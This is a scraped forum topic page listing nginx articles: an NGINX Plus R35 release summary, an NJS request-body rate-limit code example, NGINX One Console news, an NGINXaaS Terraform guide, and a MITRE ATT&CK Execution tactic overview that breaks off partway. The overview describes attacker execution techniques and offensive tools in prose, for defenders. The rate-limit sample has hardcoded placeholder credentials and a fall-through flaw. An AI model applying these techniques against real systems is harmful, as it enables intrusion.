nginx
88 TopicsManage Thousands of F5 NGINX Ingress VirtualServerRoutes with Kustomize
NGINX Ingress VirtualServerRoutes require maintaining route files AND manually updating VirtualServer references - a dual-maintenance problem that doesn't scale. This tutorial automates the integration so you only manage route files, and everything else is generated automatically.196Views2likes2CommentsVIPTest: Rapid Application Testing for F5 Environments
VIPTest is a Python-based tool for efficiently testing multiple URLs in F5 environments, allowing quick assessment of application behavior before and after configuration changes. It supports concurrent processing, handles various URL formats, and provides detailed reports on HTTP responses, TLS versions, and connectivity status, making it useful for migrations and routine maintenance.887Views5likes2CommentsF5 NGINX Plus R35 Release Now Available
We’re excited to announce the availability of F5 NGINX Plus Release 35 (R35). Based on NGINX Open Source, NGINX Plus is the only all-in-one software web server, load balancer, reverse proxy, content cache, and API gateway. New and enhanced features in NGINX Plus R35 include: ACME protocol support: This release introduces native support for Automated Certificate Management Environment (ACME) protocol in NGINX Plus. The ACME protocol automates SSL/TLS certificate lifecycle management by enabling direct communication between clients and certificate authorities for issuance, installation, revocation, and replacement of SSL certificates. Automatic JWT Renewal and Update: This capability simplifies the NGINX Plus renewal experience by automating the process of updating the license JWT for F5 NGINX instances communicating directly with the F5 licensing endpoint for license reporting. Native OIDC Enhancements: This release includes additional enhancements to the Native OpenID connect module, adding support for Relying party (RP) initiated Logout and UserInfo endpoint for streamlining authentication workflows. Support for Early Hints: NGINX Plus R35 introduces support for Early Hints (HTTP 103), which optimizes website performance by allowing browsers to preload resources before the final server response, reducing latency and accelerating content display. QUIC – CUBIC Congestion Control: With R35, we have extended support for congestion algorithms in our HTTP3/QUIC implementation to also support CUBIC which provides better bandwidth utilization resulting in quicker load times and faster downloads. NGINX Javascript QuickJS - Full ES2023 support: With this NGINX Plus release, we now support full ES2023 JavaScript specification for QuickJS runtime for your custom NGINX scripting and extensibility needs using NGINX JavaScript. Changes to Platform Support NGINX Plus R35 introduces the following updates to the NGINX Plus technical specification. Added Platforms: Support for the following platforms has been added with this release Alpine Linux 3.22 RHEL 10 Removed Platforms: Support for the following platforms has been removed starting this release. Alpine Linux 3.18 – Reached End of Support in May 2025 Ubuntu 20.04 (LTS) – Reached End of support in May 2025 Deprecated Platforms: Alpine Linux 3.19 Note: For SUSE Linux Enterprise Server (SLES) 15, SP6 is now the required service pack version. The older service packs have been EOL’ed by the vendor and are no longer supported. New Features In Details ACME Protocol Support The ACME protocol (Automated Certificate Management Environment) is a communications protocol primarily designed to automate the process of issuing, validating, renewing, and revoking digital security certificates (e.g., TLS/SSL certificates). It allows clients to interact with a Certificate Authority (CA) without requiring manual intervention, simplifying the deployment of secure websites and other services that rely on HTTPS. With the NGINX Plus R35 release, we are pleased to announce the preview release of native ACME support in NGINX. ACME support is available as a Rust-based dynamic module for both NGINX Open Source, as well as enterprise F5 NGINX One customers using NGINX Plus. Native ACME support greatly simplifies and automates the process of obtaining and renewing SSL/TLS certificates. There’s no need to track certificate expiration dates and manually update or review configs each time an update is needed. With this support, NGINX can now directly communicate with ACME-compatible Certificate Authorities (CAs) like Let's Encrypt to handle certificate management without requiring external plugins like certbot, cert-manager, etc or ongoing manual intervention. This reduces complexity, minimizes operational overhead, and streamlines the deployment of encrypted HTTPS for websites and applications while also making the certificate management process more secure and less error prone. The implementation introduces a new module ngx_http_acme_module providing built-in directives for requesting, installing, and renewing certificates directly from NGINX configuration. The current implementation supports HTTP-01 challenge with support for TLS-ALPN and DNS-01 challenges planned in future. For a detailed overview of the implementation and the value it brings, refer the ACME blog post. To get step by step instructions on how to configure ACME in your environment, refer to NGINX docs. Automatic JWT Renewal and Update This feature enables the automatic update of the JWT license for customers reporting their usage directly to the F5 licensing endpoint (product.connect.nginx.com) post successful renewal of the subscription. The feature applies to subscriptions nearing expiration (within 30 days) as well as subscriptions that have expired, but remain within the 90-day grace period. Here is how this feature works: Starting 30 days prior to JWT license expiration, NGINX Plus will notify the licensing endpoint server of JWT license expiration as part of the automatic usage reporting process. The licensing endpoint server will continually check for a renewed NGINX One subscription with F5 CRM system. Once the subscription is successfully renewed, the F5 licensing endpoint server will send the updated JWT to corresponding NGINX Plus instance. NGINX Plus instance in turn will automatically deploy the renewed JWT license to the location based on your existing configuration without the need for any NGINX reload or service restart. Note: The renewed JWT file received from F5 is named nginx-mgmt-license and is located at the state_path location on your NGINX instance. For more details, refer to NGINX docs. Native OpenID Connect Module Enhancements The NGINX Plus R34 release introduced native support for OpenID Connect (OIDC) authentication. Continuing the momentum, we are excited to add support for OIDC Relying Party (RP) Initiated Logout along with support for retrieving claims via the OIDC UserInfo endpoint in this release. Relying Party (RP) Initiated Logout RP-Initiated Logout is a method used in federated authentication systems (e.g., systems using OpenID Connect (OIDC) or Security Assertion Markup Language (SAML)) to allow a user to log out of an application (called the relying party) and propagate the logout request to other services in the authentication ecosystem, such as the identity provider (IdP) and other sessions tied to the user. This facilitates session synchronization and clean-up across multiple applications or environments. The RP-Initiated Logout support in NGINX OIDC native module helps provide a seamless user experience by enhancing the consistency of authentication and logout workflows, particularly in Single Sign-On (SSO) environments. It significantly helps improve security by ensuring user sessions are terminated securely thereby reducing the risk of unauthorized access. It also simplifies the development processes by minimizing the need for custom coding and promoting adherence to best practices. Additionally, it strengthens user privacy and supports compliance efforts enabling users to easily terminate sessions, thereby reducing the exposure from lingering session. The implementation involves the client (browser) initiating a logout by sending a request to the relying party's (NGINX) logout endpoint. NGINX(RP) adds additional parameters to the request and redirects it to the IdP, which terminates the associated user session and redirects the client to the specified post_logout_uri. Finally, NGINX as the relying party presents a post-logout confirmation page, signaling the completion of the logout process and ensuring session termination across both the relying party and the identity provider. UserInfo Retrieval Support The OIDC UserInfo endpoint is used by applications to retrieve profile information about the authenticated Identity. Applications can use this endpoint to retrieve profile information, preferences and other user-specific information to ensure a consistent user management process. The support for UserInfo endpoint in the native OIDC module provides a standardized mechanism to fetch user claims from Identity Providers (IdPs) helping simplify the authentication workflows and reducing overall system complexity. Having a standard mechanism also helps define and adopt development best practices across client applications for retrieving user claims offering tremendous value to developers, administrators, and end-users. The implementation enables the RP (nginx) to call an identity provider's OIDC UserInfo endpoint with the access token (Authorization: Bearer) and obtain scope-dependent End-user claims (e.g., profile, email, scope, address). This provides the standard, configuration-driven mechanism for claim retrieval across client applications and reduces integration complexity. Several new directives (logout_uri, post_logout_uri, logout_token_hint, and userinfo) have been added to the ngx_http_oidc_module to support both these features. Refer to our technical blog on how NGINX Plus R35 offers frictionless logout and UserInfo retrieval support as part of the native OIDC implementation for a comprehensive overview of both of these features and how they work under the hood. For instructions on how to configure the native OIDC module for various identity providers, refer the NGINX deployment guide. Early Hints Support Early Hints (RFC 8297) is a HTTP status code to improve website performance by allowing the server to send preliminary hints to the client before the final response is ready. Specifically, the server sends a 103 status code with headers indicating which resources (like CSS, JavaScript, images) the client can pre-fetch while the server is still working on generating the full response. Majority of the web browsers including Chrome, Safari and Edge support it today. A new NGINX directive early_hints has been added to specify the conditions under which backends can send Early Hints to the client. NGINX will parse the Early Hints from the backend and send them to the client. The following example shows how to proxy Early Hints for HTTP/2 and HTTP/3 clients and disable them for HTTP/1.1 early_hints $http2$http3; proxy_pass http://bar.example.com; For more details, refer NGINX docs and a detailed blog on Early Hints support in NGINX. QUIC – Support for CUBIC Congestion Control Algorithm CUBIC is a congestion control algorithm designed to optimize internet performance. It is widely used and well-tested in TCP implementations and excels in high-bandwidth and high-delay networks by efficiently managing data transmission ensuring faster speeds, rapid recovery from congestion, and reduced latency. Its adaptability to various network conditions and fair resource allocation makes it a reliable choice for delivering a smooth and responsive online experience and enhance overall user satisfaction. We announced support for CUBIC congestion algorithm in NGINX open source mainline version 1.27.4. All the bug fixes and enhancements since then are being merged into NGINX Plus R35. For a detailed overview of the implementation, refer to our blog on the topic. NGINX Javascript QuickJS - Full ES2023 support We introduced preview support for QuickJS runtime in NGINX JavaScript(njs) version 0.8.6 in the NGINX Plus R33 release. We have been quietly focused on this initiative since and are pleased to announce full ES2023 JavaScript specification support in NGINX JavaScript(njs) version 0.9.1 with NGINX Plus R35 release. With full ES2023 specification support, you can now use the latest JavaScript features that modern developers expect as standard to extend NGINX capabilities using njs. Refer to this detailed blog for a comprehensive overview of our QuickJS implementation, the motivation behind QuickJS runtime support and where we are headed with NGINX JavaScript. For specific details on how you can leverage QuickJS in your njs scripts, please refer to our documentation. Other Enhancements and Bug Fixes Variable based Access Control Support To enable robust access control using identity claims, R34 and earlier versions required a workaround involving the auth_jwt_require directive. This involved reprocessing the ID token with the auth_jwt module to manage access based on claims. This approach introduced configuration complexity and performance overhead. With R35, NGINX simplifies this process through the auth_require directive, which allows direct use of claims for resource-based access control without relying on auth_jwt. This directive is part of a new module ngx_http_auth_require_module added in this release. For ex, the following NGINX OIDC configuration maps the role claim from the id_token to $admin_role variable and sets it to 1 if the user’s role is “admin”. The /location block then uses auth_require $admin_role to restrict access, allowing only the users with admin role to proceed. http { oidc_provider my_idp { ... } map $oidc_claim_role $admin_role { "admin" 1; } server { auth_oidc my_idp; location /admin { auth_require $admin_role; } } } Though the directive is not exclusive to OIDC, when paired with auth_oidc, it provides a clean and declarative Role-Based Access Control (RBAC) mechanism within the server configuration. For example, you can easily configure access so only admins reach the /admin location, while either admins or users with specific permissions access other locations. The result is streamlined, efficient, and practical access management directly in NGINX. Note that the new auth_require directive does not replace auth_jwt_require as the two serve distinct purposes. While auth_jwt_require is an integral part of JWT validation in the JWT module focusing on headers and claims checks, auth_require operates in a separate ACCESS phase for access control. Deprecating auth_jwt_require would reduce flexibility, particularly in "satisfy" modes of operation, and complicate configurations. Additionally, auth_jwt_require plays a critical role in initializing JWT-related variables, enabling their use in subrequests. This initialization, crucial for JWE claims, cannot be done via REWRITE module directives as JWE claims are not available before JWT decryption. Support for JWS RSASSA-PSS algorithms: RSASSA-PSS algorithms are used for verifying the signatures of JSON Web Tokens (JWTs) to ensure their authenticity and integrity. In NGINX, these algorithms are typically employed via the auth_jwt_module when validating JWTs signed using RSASSA-PSS. We are adding support for following algorithms as specified in RFC 7518 (Section 3.5): PS256 PS384 PS512 Improved Node Outage Detection and Logging This release also introduces improvements in the timeout handling for zone_sync connections enabling faster detection of offline nodes and reducing counter accumulation risks. This improvement is aimed at improving synchronization of nodes in a cluster and early detection of failures improving system’s overall performance and reliability. Additional heuristics are added to detect blocked workers to proactively address prolonged event loop times. License API Updates NGINX license API endpoint now provides additional information. The “uuid” parameter in the license information is now available via the API endpoint. Changes Inherited from NGINX Open Source NGINX Plus R35 is based on NGINX 1.29.0 mainline release and inherits all functional changes, features, and bug fixes made since NGINX Plus R34 was released (which was based on 1.27.4 mainline release). Features: Early Hints support - support for response code 103 from proxy and gRPC backends; CUBIC congestion control algorithm support in QUIC connections. Loading of secret keys from hardware tokens with OpenSSL provider. Support for the "so_keepalive" parameter of the "listen" directive on macOS. Changes: The logging level of SSL errors in a QUIC handshake has been changed from "error" to "crit" for critical errors, and to "info" for the rest; the logging level of unsupported QUIC transport parameters has been lowered from "info" to "debug". Bug Fixes: nginx could not be built by gcc 15 if ngx_http_v2_module or ngx_http_v3_module modules were used. nginx might not be built by gcc 14 or newer with -O3 -flto optimization if ngx_http_v3_module was used. In the "grpc_ssl_password_file", "proxy_ssl_password_file", and "uwsgi_ssl_password_file" directives when loading SSL certificates and encrypted keys from variables; the bug had appeared in 1.23.1. In the $ssl_curve and $ssl_curves variables when using pluggable curves in OpenSSL. nginx could not be built with musl libc. Bugfixes and performance improvements in HTTP/3. Security: (CVE-2025-53859) SMTP Authentication process memory over-read: This vulnerability in the NGINX ngx_mail_smtp_module may allow an unauthenticated attacker to trigger buffer over-read resulting in worker process memory disclosure to the authentication server. For the full list of new changes, features, bug fixes, and workarounds inherited from recent releases, see the NGINX changes . Changes to the NGINX Javascript Module NGINX Plus R35 incorporates changes from the NGINX JavaScript (njs) module version 0.9.1. The following is a list of notable changes in njs since 0.8.9 (which was the version shipped with NGINX Plus R34). Features: Added support for the QuickJS-NG library. Added support for WebCrypto API, FetchAPI, TextEncoder and TextDecoder, querystring module, crypto module and xml module for the QuickJS engine. Added state file for a shared dictionary. Added ECDH support for WebCrypto. Added support for reading r.requestText or r.requestBuffer from a temporary file. Improvements: Performance improvements due to refactored handling of built-in strings, symbols, and small integers Multiple memory usage improvements improved reporting of unhandled promise rejections. Bug Fixes: Fixed segfault in njs_property_query(). The issue was introduced in b28e50b1 (0.9.0). Fixed Function constructor template injection. Fixed GCC compilation with O3 optimization level. Fixed constant is too large for 'long' warning on MIPS -mabi=n32. Fixed compilation with GCC 4.1. Fixed %TypedArray%.from() with the buffer is detached by the mapper. Fixed %TypedArray%.prototype.slice() with overlapping buffers. Fixed handling of detached buffers for typed arrays. Fixed frame saving for async functions with closures. Fixed RegExp compilation of patterns with escaped '[' characters. Fixed handling of undefined values of a captured group in RegExp.prototype[Symbol.split](). Fixed GCC 15 build error with -Wunterminated-string-initialization. Fixed name corruption in variables and headers processing. Fixed incr() method of a shared dictionary with an empty init argument for the QuickJS engine. Bugfix: accepting response headers with underscore characters in Fetch API. Fixed Buffer.concat() with a single argument in QuickJS. Bugfix: added missed syntax error for await in template literal. Fixed non-NULL terminated strings formatting in exceptions for the QuickJS engine. Fixed compatibility with recent change in QuickJS and QuickJS-NG. Fixed serializeToString(). Previously, serializeToString() was exclusiveC14n() which returned a string instead of Buffer. According to the published documentation, it should be c14n() For a comprehensive list of all the features, changes, and bug fixes, see the njs Changelog. F5 NGINX in F5’s Application Delivery & Security Platform NGINX One is part of F5’s Application Delivery & Security Platform. It helps organizations deliver, improve, and secure new applications and APIs. This platform is a unified solution designed to ensure reliable performance, robust security, and seamless scalability for applications deployed across cloud, hybrid, and edge architectures. NGINX One is the all-in-one, subscription-based package that unifies all of NGINX’s capabilities. NGINX One brings together the features of NGINX Plus, F5 NGINX App Protect, and NGINX Kubernetes and management solutions into a single, easy-to-consume package. NGINX Plus, a key component of NGINX One, adds features to open-source NGINX that are designed for enterprise-grade performance, scalability, and security. Ready to try the new release? Follow this guide for more information on installing and deploying NGINX Plus.419Views1like0CommentsNGINX Plus Request body Rate Limit with the NJS module and javascript
The nginx njs module allows javascript to process the code or as they call it on the backend nodejs. The module is dynamic for Nginx Plus https://docs.nginx.com/nginx/admin-guide/dynamic-modules/dynamic-modules/ while for the community nginx it needs to be compiled. The code and nginx configuration are also present at: https://github.com/Nikoolayy1/nginx_njs_request_body_limit/tree/main I have used the example rate limiter from https://github.com/nginx/njs-examples and https://clouddocs.f5.com/training/community/nginx/html/class3/class3.html and modified rate limit example to be based on the request body. It works as expected. The "r.internalRedirect('@app-backend');" internal redirect is needed as nginx by default does not populate or save the request body and this is why the request needs to pass 2 times in nginx proxy for the body variable to be properly populated! The nginx plus rootless container is a great option for F5 XC RE where root containers are not accepted and for Nginx on XC RE I have made another article at F5 XC vk8s open source nginx deployment on RE | DevCentral NJS "main" file code: const defaultResponse = "0"; const user = 'username'; const pass = 'username'; function ratelimit(r) { switch (r.method) { case 'POST': var body = r.requestText; r.log(`body: ${body}`); if (r.headersIn['Content-Type'] != 'application/x-www-form-urlencoded' || !body.length) { r.internalRedirect('@app-backend'); return; } var result_user = body.includes(user); var result_pass = body.includes(pass); if (!result_user) { r.internalRedirect('@app-backend'); return; } const zone = r.variables['rl_zone_name']; const kv = zone && ngx.shared && ngx.shared[zone]; if (!kv) { r.log(`ratelimit: ${zone} js_shared_dict_zone not found`); r.internalRedirect('@app-backend'); return; } const key = r.variables['rl_key'] || r.variables['remote_addr']; const window = Number(r.variables['rl_windows_ms']) || 60000; const limit = Number(r.variables['rl_limit']) || 10; const now = Date.now(); let requestData = kv.get(key); if (requestData === undefined || requestData.length === 0) { requestData = { timestamp: now, count: 1 } kv.set(key, JSON.stringify(requestData)); r.internalRedirect('@app-backend'); return; } try { requestData = JSON.parse(requestData); } catch (e) { requestData = { timestamp: now, count: 1 } kv.set(key, JSON.stringify(requestData)); r.internalRedirect('@app-backend'); return; } if (!requestData) { requestData = { timestamp: now, count: 1 } kv.set(key, JSON.stringify(requestData)); r.internalRedirect('@app-backend'); return; } if (now - requestData.timestamp >= window) { requestData.timestamp = now; requestData.count = 1; } else { requestData.count++; } const elapsed = now - requestData.timestamp; r.log(`limit: ${limit} window: ${window} elapsed: ${elapsed} count: ${requestData.count} timestamp: ${requestData.timestamp}`) let retryAfter = 0; if (requestData.count > limit) { retryAfter = 1; } kv.set(key, JSON.stringify(requestData)); if (retryAfter) { r.return(401, "Unauthorized\n"); return; } default: r.internalRedirect('@app-backend'); return; } } export default {sub, header, ratelimit, parseRequestBody, log}; Nginx nginx.conf file: server { listen 80 default_server; server_name localhost; access_log /var/log/nginx/host.access.log main; js_var $rl_zone_name kv; # shared dict zone name; requred variable js_var $rl_windows_ms 30000; # optional window in miliseconds; default 1 minute window if not set js_var $rl_limit 3; # optional limit for the window; default 10 requests if not set js_var $rl_key $remote_addr; # rate limit key; default remote_addr if not set js_set $rl_result main.ratelimit; # call ratelimit function that returns retry-after value if limit is exceeded root /var/www/html; index index.html; include /etc/nginx/mime.types; error_log /var/log/nginx/host.error_log debug; if ($target) { return 401; } location / { js_content main.ratelimit; } location @app-backend { internal; proxy_pass http://backend; } location /backend { internal; proxy_set_header Host httpforever.com; proxy_pass http://backend/; } Summary: There is another example how to populate the internal request body variable using that is needed by the njs module using the " mirror " option, shown at https://www.f5.com/company/blog/nginx/deploying-nginx-plus-as-an-api-gateway-part-2-protecting-backend-services but it did not work for me, so I used the " internal " option with "r.internalRedirect(uri)" https://nginx.org/en/docs/njs/reference.html Nginx njs feature r.subrequest can be used to populate response headers and body but mainly it is for logging and not for rate limiting and I think making a real http subrequest using javascript is not optimal and will not scale well, so I will not recommend this option as rate limiters are best left to be request based. Also I saw strange bug that the subrequest changes the content type header of the response and I had use "js_header_filter" to again change the response header.Nginx App Protect has the BD process from F5 BIG-IP AWAF/ASM that has DOS protections that can monitor the Server's response latency dynamically and make auto thresholds!59Views1like0CommentsKickstart your journey into becoming an F5 Certified Administrator, NGINX (F5-CA, NGINX)!
The F5 Certified! NGINX Administrator Accelerator is designed and aligned with the applicable NGINX Administrator Certification exams to help candidates prepare for their certification journey.57Views1like0CommentsF5 NGINX One Console July features
Introduction We are very excited to announce the new set of F5 NGINX One Console features that were released in July: • F5 NGINX App Protect WAF Policy Orchestration • F5 NGINX Ingress Controller Fleet Visibility The NGINX One Console is a central management service in the F5 Distributed Cloud that makes it easier to deploy, manage, monitor, and operate NGINX. It is available to all NGINX and F5 Distributed Cloud subscribers and is included as a part of their subscription. If you have any questions on how to get access, please reach out to me. Workshops Additionally, we are offering complementary workshops on how to use the NGINX One Console in August and September (North American Time Zone). These include a presentation, hands-on labs, and demos with live support and guidance. July 30 - F5 Test Drive Labs - F5 NGINX One - https://www.f5.com/company/events/test-drive-labs#agenda Aug 19 - NGINXperts Workshop - NGINX One Console - https://www.eventbrite.com/e/nginxpert-workshops-nginx-one-console-tickets-1511189742199 Sept 9 - F5 Test Drive Labs - NGINX One - https://www.f5.com/company/events/test-drive-labs#agenda Sept 10 - NGINXperts Workshop - NGINX One Console - https://www.eventbrite.com/e/nginxpert-workshops-nginx-one-console-tickets-1393597239859?aff=oddtdtcreator NGINX App Protect WAF Policy Orchestration You can now centrally manage NGINX App Protect WAF in the NGINX One Console. Easily create and edit WAF policies in the NGINX One Console, compare changes, and publish to instances and configuration sync groups. Both App Protect v4 and v5 are supported! Find the guides on how to secure F5 NGINX with NGINX App Protect and the NGINX One Console here: https://docs.nginx.com/nginx-one/nap-integration/ NGINX Ingress Controller Fleet Visibility NGINX Ingress Controller deployments can now be monitored in the NGINX One Console. See all versions of NGINX Ingress Controller deployments, what underlying instances make up the control pods, and see the underlying NGINX configuration. Coming later this quarter, CVE monitoring for NGINX Ingress Controller and F5 NGINX Gateway Fabric inclusion. For details, see how you can Connect Ingress Controller to NGINX One Console: https://docs.nginx.com/nginx-one/k8s/add-nic/ Find all the latest additions to the NGINX One Console in our changelog: https://docs.nginx.com/nginx-one/changelog/https://docs.nginx.com/nginx-one/changelog/ The NGINX Impact in F5’s Application Delivery & Security Platform NGINX One Console is part of F5’s Application Delivery & Security Platform. It helps organizations deliver, improve, and secure new applications and APIs. This platform is a unified solution designed to ensure reliable performance, robust security, and seamless scalability. It is used for applications deployed across cloud, hybrid, and edge architectures. The NGINX One Console is also a key component of NGINX One, the all-in-one, subscription-based package that unifies all of NGINX’s capabilities. NGINX One brings together the features of NGINX Plus, NGINX App Protect, and NGINX Kubernetes and management solutions into a single, easy-to-consume package. As a cornerstone of the NGINX One package, NGINX One Console extends the capabilities of open-source NGINX. It adds features designed specifically for enterprise-grade performance, scalability, and security. Find all the latest additions to the NGINX One Console in our changelog: https://docs.nginx.com/nginx-one/changelog/https://docs.nginx.com/nginx-one/changelog/77Views0likes0CommentsF5 NGINX Automation Examples [Part 2: Deploying NGINXaaS with App Protect and Grafana Integration]
Introduction Welcome back to the F5 NGINX Automation Examples series. We will explore innovative ways to leverage the power of NGINX and F5 technologies for modern application deployment. If you’re new to this series, be sure to start with our first article. This series utilizes the F5 NGINX Automation GitHub repository along with a robust CI/CD platform to facilitate the deployment of F5 NGINX as a Service for Azure (F5 NGINXaaS for Azure). This includes integrations with F5 NGINX App Protect for enhanced security, as well as Azure Grafana for comprehensive monitoring and visualization of system metrics. The approach is deeply rooted in DevSecOps principles. It ensures that security, automation, and collaboration are woven into every stage of your development and deployment processes. F5 NGINXaaS for Azure is a versatile and powerful Application Delivery as a Service (ADCaaS) platform that seamlessly integrates with the Microsoft Azure cloud environment. This service harnesses the scalability, flexibility, and reliability of cloud-native infrastructure. Combined with the adaptability of NGINX technology, it empowers organizations to deploy, secure, and scale their modern applications and microservices efficiently. Whether you're managing small projects or large-scale enterprise applications, NGINXaaS provides the tools and infrastructure you need to meet your evolving IT and business needs. In this detailed example, we present a comprehensive, step-by-step guide for setting up a Terraform deployment of NGINXaaS on Azure with NGINX App Protect. This deployment will enable advanced load-balancing capabilities for demonstration applications such as tea and coffee, which run across two virtual machines. The NGINX App Protect policy will secure upstream applications, ensuring robust security and traffic management. Furthermore, this guide will walk you through deploying Azure Grafana. This powerful visualization tool lets you effectively monitor and analyze system metrics, including those from F5 NGINX Plus and virtual machines. By doing this, you can get useful information about how your system works, find problems, and make your deployment work best for you and your customers. Architecture Diagram NGINXaaS + App Protect with Azure Grafana Workflow guide Deploying F5 NGINXaaS on Azure with App Protect and Azure Grafana Integration The workflow guide provides step-by-step instructions on how to deploy using Terraform, along with other relevant instructions. Note: This workflow guide covers the deployment of Precompiled App Protect Policies in NGINXaaS using Terraform. Custom security policies for NGINXaaS for Azure can be created and managed via API or Azure Portal, but not currently through Terraform. Prerequisites: Azure Account - Due to the assets being created, the free tier will no longer be applicable. GitHub Account Tools: Cloud Provider: Azure IAC: Terraform CI/CD: GitHub Actions Conclusion This article outlines how to automate the deployment of F5 NGINXaaS on Azure, including NGINX App Protect and Azure Grafana integration, using Terraform. By following the step-by-step process, you can efficiently create a robust and scalable environment to manage your applications. The integration of NGINX App Protect enhances the security of your deployments. Azure Grafana provides essential insights through visualization, helping you monitor performance and make informed decisions. Resources Elevate Your Cloud Journey with F5 NGINXaaS for Azure How to Elevate Application Performance and Availability in Azure with F5 NGINXaaS Enhancing Application Delivery with F5 NGINXaaS for Azure: ADC-as-a-Service Redefined84Views0likes0CommentsOverview of MITRE ATT&CK Execution Tactic (TA0002)
Introduction to Execution Tactic (TA0002): Execution refers to the methods adversaries use to run malicious code on a target system. This tactic includes a range of techniques designed to execute payloads after gaining access to the network. It is a key stage in the attack lifecycle, as it allows attackers to activate their malicious actions, such as deploying malware, running scripts, or exploiting system vulnerabilities. Successful execution can lead to deeper system control, enabling attackers to perform actions like data theft, system manipulation, or establishing persistence for future exploitation. Now, let’s dive into the various techniques under the Execution tactic and explore how attackers use them. 1. T1651: Cloud Administration Command: Cloud management services can be exploited to execute commands within virtual machines. If an attacker gains administrative access to a cloud environment, they may misuse these services to run commands on the virtual machines. Furthermore, if an adversary compromises a service provider or a delegated administrator account, they could also exploit trusted relationships to execute commands on connected virtual machines. 2. T1059: Command and Scripting Interpreter The misuse of command and script interpreters allows adversaries to execute commands, scripts, or binaries. These interfaces, such as Unix shells on macOS and Linux, Windows Command Shell, and PowerShell are common across platforms and provide direct interaction with systems. Cross-platform interpreters like Python, as well as those tied to client applications (e.g., JavaScript, Visual Basic), can also be misused. Attackers may embed commands and scripts in initial access payloads or download them later via an established C2 (Command and Control) channel. Commands may also be executed via interactive shells or through remote services to enable remote execution. (.001) PowerShell: As PowerShell is already part of Windows, attackers often exploit it to execute commands discreetly without triggering alarms. It’s often used for things like finding information, moving across networks, and running malware directly in memory. This helps avoid detection because nothing is written to disk. Attackers can also execute PowerShell scripts without launching the powershell.exe program by leveraging.NET interfaces. Tools like Empire, PowerSploit, and PoshC2 make it even easier for attackers to use PowerShell for malicious purposes. Example - Remote Command Execution (.002) AppleScript: AppleScript is an macOS scripting language designed to control applications and system components through inter-application messages called AppleEvents. These AppleEvent messages can be sent by themselves or with AppleScript. They can find open windows, send keystrokes, and interact with almost any open application, either locally or remotely. AppleScript can be executed in various ways, including through the command-line interface (CLI) and built-in applications. However, it can also be abused to trigger actions that exploit both the system and the network. (.003) Windows Command Shell: The Windows Command Prompt (CMD) is a lightweight, simple shell on Windows systems, allowing control over most system aspects with varying permission levels. However, it lacks the advanced capabilities of PowerShell. CMD can be used from a distance using Remote Services. Attackers may use it to execute commands or payloads, often sending input and output through a command-and-control channel. Example - Remote Command Execution (.004) Unix Shell: Unix shells serve as the primary command-line interface on Unix-based systems. They provide control over nearly all system functions, with certain commands requiring elevated privileges. Unix shells can be used to run different commands or payloads. They can also run shell scripts to combine multiple commands as part of an attack. Example - Remote Command Execution (.005) Visual Basic: Visual Basic (VB) is a programming language developed by Microsoft, now considered a legacy technology. Visual Basic for Applications (VBA) and VBScript are derivatives of VB. Malicious actors may exploit VB payloads to execute harmful commands, with common attacks, including automating actions via VBScript or embedding VBA content (like macros) in spear-phishing attachments. (.006) Python: Attackers often use popular scripting languages, like Python, due to their interoperability, cross-platform support, and ease of use. Python can be run interactively from the command line or through scripts that can be distributed across systems. It can also be compiled into binary executables. With many built-in libraries for system interaction, such as file operations and device I/O, attackers can leverage Python to download and execute commands, scripts, and perform various malicious actions. Example - Code Injection (.007) JavaScript: JavaScript (JS) is a platform-independent scripting language, commonly used in web pages and runtime environments. Microsoft's JScript and JavaScript for Automation (JXA) on macOS are based on JS. Adversaries exploit JS to execute malicious scripts, often through Drive-by Compromise or by downloading scripts as secondary payloads. Since JS is text-based, it is often obfuscated to evade detection. Example - XSS (.008) Network Device CLI: Network devices often provide a CLI or scripting interpreter accessible via direct console connection or remotely through telnet or SSH. These interfaces allow interaction with the device for various functions. Adversaries may exploit them to alter device behavior, manipulate traffic, load malicious software by modifying configurations, or disable security features and logging to avoid detection. (.009) Cloud API: Cloud APIs offer programmatic access to nearly all aspects of a tenant, available through methods like CLIs, in-browser Cloud Shells, PowerShell modules (e.g., Azure for PowerShell), or SDKs for languages like Python. These APIs provide administrative access to major services. Malicious actors with valid credentials, often stolen, can exploit these APIs to perform malicious actions. (.010) AutoHotKey & AutoIT: AutoIT and AutoHotkey (AHK) are scripting languages used to automate Windows tasks, such as clicking buttons, entering text, and managing programs. Attackers may exploit AHK (.ahk) and AutoIT (.au3) scripts to execute malicious code, like payloads or keyloggers. These scripts can also be embedded in phishing payloads or compiled into standalone executable files (.011) Lua: Lua is a cross-platform scripting and programming language, primarily designed for embedding in applications. It can be executed via the command-line using the standalone Lua interpreter, through scripts (.lua), or within Lua-embedded programs. Adversaries may exploit Lua scripts for malicious purposes, such as abusing or replacing existing Lua interpreters to execute harmful commands at runtime. Malware examples developed using Lua include EvilBunny, Line Runner, PoetRAT, and Remsec. (.012) Hypervisor CLI: Hypervisor CLIs offer extensive functionality for managing both the hypervisor and its hosted virtual machines. On ESXi systems, tools like “esxcli” and “vim-cmd” allow administrators to configure and perform various actions. Attackers may exploit these tools to enable actions like File and Directory Discovery or Data Encrypted for Impact. Malware such as Cheerscrypt and Royal ransomware have leveraged this technique. 3. T1609: Container Administration Command Adversaries may exploit container administration services, like the Docker daemon, Kubernetes API server, or kubelet, to execute commands within containers. In Docker, attackers can specify an entry point to run a script or use docker exec to execute commands in a running container. In Kubernetes, with sufficient permissions, adversaries can gain remote execution by interacting with the API server, kubelet, or using commands like kubectl exec within the cluster. 4. T1610: Deploy Container Containers can be exploited by attackers to run malicious code or bypass security measures, often through the use of harmful processes or weak settings, such as missing network rules or user restrictions. In Kubernetes environments, attackers may deploy containers with elevated privileges or vulnerabilities to access other containers or the host node. They may also use compromised or seemingly benign images that later download malicious payloads. 5. T1675: ESXi Administration Command ESXi administration services can be exploited to execute commands on guest machines within an ESXi virtual environment. ESXi-hosted VMs can be remotely managed via persistent background services, such as the VMware Tools Daemon Service. Adversaries can perform malicious activities on VMs by executing commands through SDKs and APIs, enabling follow-on behaviors like File and Directory Discovery, Data from Local System, or OS Credential Dumping. 6. T1203: Exploitation for Client Execution Adversaries may exploit software vulnerabilities in client applications to execute malicious code. These exploits can target browsers, office applications, or common third-party software. By exploiting specific vulnerabilities, attackers can achieve arbitrary code execution. The most valuable exploits in an offensive toolkit are often those that enable remote code execution, as they provide a pathway to gain access to the target system. Example: Remote Code Execution 7. T1674: Input Injection Input Injection involves adversaries simulating keystrokes on a victim’s computer to carry out actions on their behalf. This can be achieved through several methods, such as emulating keystrokes to execute commands or scripts, or using malicious USB devices to inject keystrokes that trigger scripts or commands. For example, attackers have employed malicious USB devices to simulate keystrokes that launch PowerShell, enabling the download and execution of malware from attacker-controlled servers. 8. T1559: Inter-Process Communication Inter-Process Communication 